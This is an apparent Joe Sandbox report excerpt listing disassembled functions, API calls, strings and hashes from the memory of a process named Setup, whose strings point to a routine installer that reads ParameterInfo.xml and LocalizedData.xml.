                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: File$H_prolog3$AttributesCopyException@8ExistsPathSizeThrow
                                                              • String ID: Copy of Header File failed$DHTML Header File doesn't exist$DHTMLLogger
                                                              • API String ID: 1055460099-1824744887
                                                              • Opcode ID: adc9a6bf1e51f0bd3ba7d21011e52593c798a87d5b02093a4aada0d5960a493f
                                                              • Instruction ID: cbb29fff9281f4a05b9d752ccacfe60c0934d0b5da3cab74fa8207832c0d1858
                                                              • Opcode Fuzzy Hash: adc9a6bf1e51f0bd3ba7d21011e52593c798a87d5b02093a4aada0d5960a493f
                                                              • Instruction Fuzzy Hash: E8519F725083459FC710DF64C844E9FBBE9BFA5358F440A2EF1A0D7A90D730D6188B56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C944E70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 141fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C944E77
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C915FCE: __EH_prolog3.LIBCMT ref: 6C915FD5
                                                                • Part of subcall function 6C915FCE: PathIsRelativeW.SHLWAPI(?,?,?,?,?,ParameterInfo.xml,?,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C916018
                                                              • __CxxThrowException@8.LIBCMT ref: 6C944F68
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • ReadFile.KERNEL32(?,?,00000002,?,00000000,?,80000000,00000001,00000003,00000080,00000000,?,?,?,?,0000002C), ref: 6C944F7E
                                                              • FindCloseChangeNotification.KERNEL32(?), ref: 6C944FA1
                                                                • Part of subcall function 6C918329: __EH_prolog3.LIBCMT ref: 6C918330
                                                                • Part of subcall function 6C91A3BC: __EH_prolog3.LIBCMT ref: 6C91A3C3
                                                              Strings
                                                              • ParameterInfo.xml, xrefs: 6C944FE5
                                                              • File %s could not be opened for read, xrefs: 6C944F0F
                                                              • File %s is not UTF-16 with Byte Order Marks (BOM), xrefs: 6C944FCC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$ChangeCloseDispatcherExceptionException@8FileFindNotificationPathReadRelativeThrowUser
                                                              • String ID: File %s could not be opened for read$File %s is not UTF-16 with Byte Order Marks (BOM)$ParameterInfo.xml
                                                              • API String ID: 2138378564-652212332
                                                              • Opcode ID: 7027f40a45c8570010ac1f6d51882c4df945df6febcb4983d1f1d0c28dcef16f
                                                              • Instruction ID: f80e25d8be32c9f36f8f927c903a969e59c38ea7bba56f4e3f9a4e020ebf586b
                                                              • Opcode Fuzzy Hash: 7027f40a45c8570010ac1f6d51882c4df945df6febcb4983d1f1d0c28dcef16f
                                                              • Instruction Fuzzy Hash: 23516C71900149EFDF01CFE8C944ADEBBB9AF25318F14855AE115B7A80DB30CA19CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9254B1 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 125COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9254B8
                                                              • __CxxThrowException@8.LIBCMT ref: 6C925540
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              Strings
                                                              • \LocalizedData.xml: should have atleast one 'Language' child element!, xrefs: 6C925599
                                                              • ParameterInfo.xml, xrefs: 6C925565
                                                              • Unable to find Language element for LangID="%d" in localized data, xrefs: 6C92551A
                                                              • W, xrefs: 6C925530
                                                              • Schema validation failure in file , xrefs: 6C925575
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: ParameterInfo.xml$Schema validation failure in file $Unable to find Language element for LangID="%d" in localized data$W$\LocalizedData.xml: should have atleast one 'Language' child element!
                                                              • API String ID: 2489616738-3464115581
                                                              • Opcode ID: 5c401fbab1994108dcb799e2245dcdff338bd95ada1f5e3c126ef56d233d5862
                                                              • Instruction ID: 11803f25abf2c61648d27cc2141a05d6bf6b27d871d1575da6b505ed54cb8982
                                                              • Opcode Fuzzy Hash: 5c401fbab1994108dcb799e2245dcdff338bd95ada1f5e3c126ef56d233d5862
                                                              • Instruction Fuzzy Hash: 1541AE71A01208EFDB04CBE8C844BDDB7B9AF29318F244259F014EBB84DB34DA09CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C947F6A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C947F74
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • _memset.LIBCMT ref: 6C947FD4
                                                              • GetVersionExW.KERNEL32 ref: 6C947FED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3H_prolog3_Version_memset
                                                              • String ID: Could not determine OS version$OS Description = %s$OS Version = %d.%d.%d, Platform %d$OS Version Information
                                                              • API String ID: 3727276431-2914782974
                                                              • Opcode ID: b84c7c878a69884fd0987f560031c3d7405d7c54bdbb14153c27023b8d9b4a3c
                                                              • Instruction ID: 0204e5a682269a9ecda4b30ae609c8e47d4d5293bd4782abc8c4f72f7b39e69a
                                                              • Opcode Fuzzy Hash: b84c7c878a69884fd0987f560031c3d7405d7c54bdbb14153c27023b8d9b4a3c
                                                              • Instruction Fuzzy Hash: 7B4159719001189BCB24DBA8CC45BCDB7B8AF19308F0484D6E208E7A90D770EB98CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9195C1 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9195C8
                                                              • VariantInit.OLEAUT32(?), ref: 6C9195DB
                                                              • VariantClear.OLEAUT32(00000008), ref: 6C91962E
                                                              • SysFreeString.OLEAUT32(?), ref: 6C91960E
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • SysAllocString.OLEAUT32(00000000), ref: 6C919651
                                                              • __CxxThrowException@8.LIBCMT ref: 6C9196F8
                                                              Strings
                                                              • schema validation error: attribute not found - , xrefs: 6C919676
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3StringVariant$AllocClearException@8FreeInitThrow
                                                              • String ID: schema validation error: attribute not found -
                                                              • API String ID: 8365360-3489740836
                                                              • Opcode ID: 0caecb9b6713c0f5ac0a1b9d3ac3aa6f0427557138c9934dea8224464f8b07f5
                                                              • Instruction ID: 514112107be74644e74dae3977c60ef2ade3c6ba0fae70a07c01e8d91140f544
                                                              • Opcode Fuzzy Hash: 0caecb9b6713c0f5ac0a1b9d3ac3aa6f0427557138c9934dea8224464f8b07f5
                                                              • Instruction Fuzzy Hash: 1B417371904249EFCB00DFA4C884EDE7B79BF25318F144659F421E7A40D734DA48CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95374B Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C953752
                                                                • Part of subcall function 6C915D3F: __EH_prolog3.LIBCMT ref: 6C915D46
                                                                • Part of subcall function 6C915D3F: GetModuleFileNameW.KERNEL32(6C8F0000,00000010,00000104,?,6C94831D,00000000), ref: 6C915D93
                                                                • Part of subcall function 6C91C259: __EH_prolog3.LIBCMT ref: 6C91C260
                                                                • Part of subcall function 6C948E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9599FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C948E6E
                                                              • PathFileExistsW.SHLWAPI(?,SetupResources.dll,00000000,00000738,00000000,6C94FA6E,0000000C,6C953A05,?,6C90A794,?), ref: 6C9537B7
                                                              • PathFileExistsW.SHLWAPI(00000000,LocalizedData.xml,00000000,00000738,00000000), ref: 6C953846
                                                                • Part of subcall function 6C9139AD: __EH_prolog3.LIBCMT ref: 6C9139B4
                                                              Strings
                                                              • SetupResources.dll, xrefs: 6C9537A0
                                                              • SetupResources.dll missing from %d directory, xrefs: 6C9537BE
                                                              • LocalizedData.xml missing from %d directory, xrefs: 6C95384D
                                                              • LocalizedData.xml, xrefs: 6C953835
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$FilePath$Exists$AppendModuleName
                                                              • String ID: LocalizedData.xml$LocalizedData.xml missing from %d directory$SetupResources.dll$SetupResources.dll missing from %d directory
                                                              • API String ID: 3590062302-1245617268
                                                              • Opcode ID: ec459222ae4b448fdf9360bdb4cdbbdbc9d63cb8d8e67cfee01682afc15a19d4
                                                              • Instruction ID: 901e66e92186d73ad0ff5d3358415ad34627696aa1f8d4c989d37f82d403586d
                                                              • Opcode Fuzzy Hash: ec459222ae4b448fdf9360bdb4cdbbdbc9d63cb8d8e67cfee01682afc15a19d4
                                                              • Instruction Fuzzy Hash: 62319071900109EFDB10DBB8CC45ADE77B8AF32328F148651E524EBB91C730DA188BA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95101A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C951021
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91C406: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,?,?,?,?,?,6C9535F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 6C91C426
                                                                • Part of subcall function 6C91C406: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,6C950F4A,00000004,?,?,?,6C9535F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 6C91C43F
                                                                • Part of subcall function 6C91C406: RegCloseKey.KERNEL32(?,?,?,?,6C9535F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType,?,02642228,00000004,6C950F4A,?), ref: 6C91C44E
                                                              • GetLastError.KERNEL32(?,Software\Microsoft\DevDiv,?,?,PerfLab,?,?,0000000C,6C94A58E,?,6C90A794,?,02642228,?,00000000,?), ref: 6C951092
                                                              • GetLastError.KERNEL32(?,00000000,?,Failed to record IsInternal,?,Software\Microsoft\DevDiv,?,?,PerfLab,?,?,0000000C,6C94A58E,?,6C90A794,?), ref: 6C9510F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prolog3Last$CloseOpenQueryValue
                                                              • String ID: Failed to record IsAdmin$Failed to record IsInternal$PerfLab$Software\Microsoft\DevDiv
                                                              • API String ID: 716194244-1174128248
                                                              • Opcode ID: 56a1b4c4496d695a07a8d1b9f53985e4c98c0c5141c0bc83b9f3bb6217160410
                                                              • Instruction ID: b7d793d5d0752b3211203372188d333518a293ce619546021da82e6bdc9c0f23
                                                              • Opcode Fuzzy Hash: 56a1b4c4496d695a07a8d1b9f53985e4c98c0c5141c0bc83b9f3bb6217160410
                                                              • Instruction Fuzzy Hash: AB31E471A00206EBD710CFB5CD059AE7BB9BFA6318B604619E420E7B90C730DA15CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9176AC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9176B3
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • GetModuleFileNameW.KERNEL32(00000000,00000010,00000104), ref: 6C917711
                                                              • GetFileVersionInfoSizeW.KERNELBASE(00000010,?), ref: 6C91772A
                                                              • GetFileVersionInfoW.KERNELBASE(00000010,?,00000000,00000000), ref: 6C917745
                                                              • VerQueryValueW.VERSION(00000000,6C8F496C,?,?), ref: 6C91775D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: File$H_prolog3InfoVersion$ModuleNameQuerySizeValue
                                                              • String ID: %d.%d.%d.%d$0.0.0.0
                                                              • API String ID: 1538924429-464342551
                                                              • Opcode ID: d32818a9750c06609dd7a9f414278f7c2e9ff957de887f622e16cf690a295819
                                                              • Instruction ID: 3e258ff4862393cf6e84cc80063a3d8d17a27cd7f92790b1dbf5b3ce4b718786
                                                              • Opcode Fuzzy Hash: d32818a9750c06609dd7a9f414278f7c2e9ff957de887f622e16cf690a295819
                                                              • Instruction Fuzzy Hash: B8319FB1A0021AABDB04DFA5CC84CBFB779BF65358B10452AF851A7B80D730DD06DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C947E78 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C947E7F
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948380: __EH_prolog3.LIBCMT ref: 6C948387
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: AlwaysUploaded$Disabled$Unknown$User Experience Data Collection Policy$User Experience Data Collection Policy: %s$UserControlled
                                                              • API String ID: 431132790-3357067047
                                                              • Opcode ID: 71c81445299c3e1f55dbc1e844638c657a295d7707925db7a29893534447b19c
                                                              • Instruction ID: ebe11a007a6df15ab6fb2813a0a22215f9589300a662d3e2e3140e9d9f5d4108
                                                              • Opcode Fuzzy Hash: 71c81445299c3e1f55dbc1e844638c657a295d7707925db7a29893534447b19c
                                                              • Instruction Fuzzy Hash: AE214B71900149ABDF04DBA8C944ADEBBF9AF25208F14844AE110E7B81C735DA19CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C938EB8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateWindowExW.USER32(00000000,STATIC,00000000,0000000E,80000000,80000000,00000000,00000000,00000000,00000000,00000000), ref: 6C938F00
                                                                • Part of subcall function 6C968244: GetWindowLongW.USER32(?,000000F0), ref: 6C96826A
                                                                • Part of subcall function 6C968244: GetParent.USER32(?), ref: 6C96827C
                                                                • Part of subcall function 6C968244: GetWindowRect.USER32(?,?), ref: 6C968296
                                                                • Part of subcall function 6C968244: GetWindowLongW.USER32(00000000,000000F0), ref: 6C9682AC
                                                                • Part of subcall function 6C968244: MonitorFromWindow.USER32(?,00000002), ref: 6C9682CB
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 6C938F15
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 6C938F25
                                                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 6C938F32
                                                                • Part of subcall function 6C94BC49: SendMessageW.USER32(?,00000172,00000000,?), ref: 6C94BC5A
                                                              • GetDesktopWindow.USER32 ref: 6C938F44
                                                                • Part of subcall function 6C968244: GetWindow.USER32(?,00000004), ref: 6C968288
                                                                • Part of subcall function 6C968244: GetMonitorInfoW.USER32(00000000,?), ref: 6C9682E8
                                                                • Part of subcall function 6C968244: SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015), ref: 6C9683B8
                                                              • ShowWindow.USER32(?,00000001), ref: 6C938F57
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$Monitor$CreateDesktopFromImageInfoLoadMessageParentRectSendShow
                                                              • String ID: STATIC
                                                              • API String ID: 4041997823-1882779555
                                                              • Opcode ID: 41226ef0a713ffd10a4ca9b43314ccb350529ce9536631fdf05912a10e750f26
                                                              • Instruction ID: e686392c7db538dbd5c901e2c0074213c634254f6949d37d896f24a4911137f0
                                                              • Opcode Fuzzy Hash: 41226ef0a713ffd10a4ca9b43314ccb350529ce9536631fdf05912a10e750f26
                                                              • Instruction Fuzzy Hash: 5111B171605210BFDB205F2A8C08EDB7FBDEF9A364F100629B469D2290DB729810CBE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95ACD8 Relevance: 12.1, APIs: 8, Instructions: 93COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C95ACDF
                                                              • GetTokenInformation.KERNELBASE(00000002,00000001(TokenIntegrityLevel),00000000,00000000,00000009,0000000C,6C9449C0,6C90A5D8,6C90A54C), ref: 6C95AD06
                                                              • GetLastError.KERNEL32 ref: 6C95AD08
                                                              • GetTokenInformation.KERNELBASE(00000002,00000001(TokenIntegrityLevel),00000008,00000400,00000400,80070216), ref: 6C95AD81
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: InformationToken$ErrorH_prolog3_Last
                                                              • String ID:
                                                              • API String ID: 654496852-0
                                                              • Opcode ID: 0984bb99c4a18442ea2a8d52da5c86c480af0b8c0eb2a6faf7e587e66d87ef46
                                                              • Instruction ID: de8f826a1847cbf85ace70ff3a54346142d4229a79fb454025b4f37d881fa7b9
                                                              • Opcode Fuzzy Hash: 0984bb99c4a18442ea2a8d52da5c86c480af0b8c0eb2a6faf7e587e66d87ef46
                                                              • Instruction Fuzzy Hash: 4F3101329005259BCB22EF69C840AFE77B8AF15769B614111E900BBA50CB30CE65CBF8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C925E2B Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 169COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6C915D3F: __EH_prolog3.LIBCMT ref: 6C915D46
                                                                • Part of subcall function 6C915D3F: GetModuleFileNameW.KERNEL32(6C8F0000,00000010,00000104,?,6C94831D,00000000), ref: 6C915D93
                                                                • Part of subcall function 6C925B82: __EH_prolog3_GS.LIBCMT ref: 6C925B8C
                                                                • Part of subcall function 6C925B82: _memset.LIBCMT ref: 6C925BBB
                                                                • Part of subcall function 6C925B82: FindFirstFileW.KERNEL32(?,?,????), ref: 6C925BDA
                                                                • Part of subcall function 6C925B82: FindClose.KERNEL32(?), ref: 6C925CC1
                                                              • __CxxThrowException@8.LIBCMT ref: 6C925FF0
                                                                • Part of subcall function 6C968EAB: _memcpy_s.LIBCMT ref: 6C968EFC
                                                                • Part of subcall function 6C948E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9599FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C948E6E
                                                              • PathFileExistsW.SHLWAPI(?,LocalizedData.xml,?,?,?,512AC3CC,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 6C925EF1
                                                                • Part of subcall function 6C925CE1: __EH_prolog3.LIBCMT ref: 6C925CE8
                                                                • Part of subcall function 6C925CE1: CoInitialize.OLE32(00000000), ref: 6C925D1A
                                                                • Part of subcall function 6C925CE1: CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,?,?,?,00000014,6C925F14,?,?,?,?,512AC3CC,ParameterInfo.xml,00000000), ref: 6C925D38
                                                                • Part of subcall function 6C925CE1: CoUninitialize.OLE32(?,?,00000014,6C925F14,?,?,?,?,512AC3CC,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?), ref: 6C925DE8
                                                                • Part of subcall function 6C925CE1: SysFreeString.OLEAUT32(00000738), ref: 6C925DF1
                                                              Strings
                                                              • LocalizedData.xml in resource folder %s, does not have a Language element, xrefs: 6C925F87
                                                              • LocalizedData.xml is missing in resource folder %s. Every resource folder needs a LocalizedData.xml, xrefs: 6C926026
                                                              • ParameterInfo.xml, xrefs: 6C925E45, 6C925FA2
                                                              • LocalizedData.xml, xrefs: 6C925EDF
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
